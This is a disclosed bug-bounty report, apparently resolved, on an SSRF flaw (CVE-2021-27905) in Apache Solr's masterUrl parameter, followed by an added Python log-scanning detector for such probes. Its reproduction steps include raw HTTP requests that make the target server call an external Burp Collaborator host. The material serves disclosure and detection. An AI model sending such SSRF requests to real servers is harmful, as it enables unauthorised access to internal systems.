SSRF due to CVE-2021-27905 in www.████████
Medium
Vulnerability Details
Apache Solr is vulnerable to SSRF using the parameter "masterUrl". This issue is registered as [CVE-2021-27905](https://nvd.nist.gov/vuln/detail/CVE-2021-27905).
## Impact
A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform [arbitrary command execution](https://portswigger.net/web-security/os-command-injection).
An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks that appear to originate from the organization hosting the vulnerable application, leading to potential legal liabilities and reputational damage.
### Supporting Material/References
https://portswigger.net/web-security/ssrf
https://www.anquanke.com/post/id/238201
## System Host(s)
www.██████████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-27905
## Steps to Reproduce
First we need to send this GET request
```
GET /solr/admin/cores?wt=json HTTP/1.1
Host: www.███
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Accept-Language: en
Connection: close
Accept-Encoding: gzip
```
Response
```
HTTP/1.1 200 OK
Connection: close
Content-Length: 1002
Cache-Control: max-age=2592000
Content-Type: text/plain;charset=UTF-8
Date: Tue, 04 May 2021 05:13:17 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
████
```
Now we can make an HTTP request to the target we want to test. I'll be using Burp Collaborator; to test it yourself, please replace the value accordingly.
Request
```
GET █████████masterUrl=http://6pwo0p85qh07drdgdlr9nr9hn8tyhn.burpcollaborator.net HTTP/1.1
Host: www.███
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Accept-Language: en
Connection: close
Accept-Encoding: gzip
```
Response
```
HTTP/1.1 200 OK
Connection: close
Content-Length: 174
Cache-Control: no-cache, no-store
Content-Type: text/xml;charset=UTF-8
Date: Tue, 04 May 2021 05:13:19 GMT
Etag: "17935cb837f"
Expires: Sat, 01 Jan 2000 01:00:00 GMT
Last-Modified: Tue, 04 May 2021 05:13:20 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: ARRAffinity=450f2c90c5749e5ead79f5f3389d0369674c71e046ba20f5151e80e68da4c908;Path=/;Domain=www.██████
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
<?xml version="1.0" encoding="UTF-8"?>
<response>
<lst name="responseHeader"><int name="status">0</int><int name="QTime">0</int></lst><str name="status">OK</str>
</response>
```
And in Burp Collaborator we receive an HTTP request from the server:
█████
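As an added example (not part of the report), the following Python detection logic scans web-server access logs for Solr requests whose `masterUrl` parameter names a host outside an assumed allow-list of legitimate replication primaries. The log lines are constructed, the handler path is a placeholder because the report redacts it, and `solr-primary.internal` is an assumed allow-list entry.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines, not taken from the report. The replication
# handler path is a placeholder because the report redacts it; only the "masterUrl"
# parameter name and the Collaborator hostname come from the report.
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2021:05:13:17 +0000] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 1002
10.0.0.5 - - [04/May/2021:05:13:19 +0000] "GET /solr/core1/HANDLER_PLACEHOLDER?masterUrl=http://6pwo0p85qh07drdgdlr9nr9hn8tyhn.burpcollaborator.net HTTP/1.1" 200 174
10.0.0.7 - - [04/May/2021:05:20:01 +0000] "GET /solr/core1/HANDLER_PLACEHOLDER?wt=json&masterUrl=http%3A%2F%2Fsolr-primary.internal%3A8983%2Fsolr%2Fcore1 HTTP/1.1" 200 174
10.0.0.9 - - [04/May/2021:05:21:44 +0000] "GET /solr/core1/select?q=*:* HTTP/1.1" 200 5120
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

def masterurl_host(target):
    """Return the host named by the masterUrl query parameter, or None if absent."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("masterUrl")
    if not values:
        return None
    raw = values[0]          # parse_qs already percent-decodes the value once
    if "://" not in raw:     # scheme-less values would otherwise parse as a path
        raw = "http://" + raw
    return (urlsplit(raw).hostname or "").lower()

def find_masterurl_ssrf(log_text, allowed_hosts):
    """Flag Solr requests whose masterUrl names a host outside the replication allow-list."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m or not m.group("target").startswith("/solr/"):
            continue
        host = masterurl_host(m.group("target"))
        if host is None:
            continue         # no masterUrl parameter: unrelated to this CVE
        if host not in allowed:
            findings.append({"client": line.split()[0],
                             "master_host": host,
                             "target": m.group("target")})
    return findings

if __name__ == "__main__":
    # Assumed allow-list: the only legitimate replication primary for this deployment.
    for f in find_masterurl_ssrf(SAMPLE_LOG, ["solr-primary.internal"]):
        print(f"possible CVE-2021-27905 probe from {f['client']} -> {f['master_host']}")
```

Requests whose `masterUrl` points at an allow-listed primary are ignored, so the check can run continuously over logs of a legitimately replicating deployment.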
## Suggested Mitigation/Remediation Actions
## Report Stats
- Report ID: 1183472
- State: Closed
- Substate: resolved
- Upvotes: 6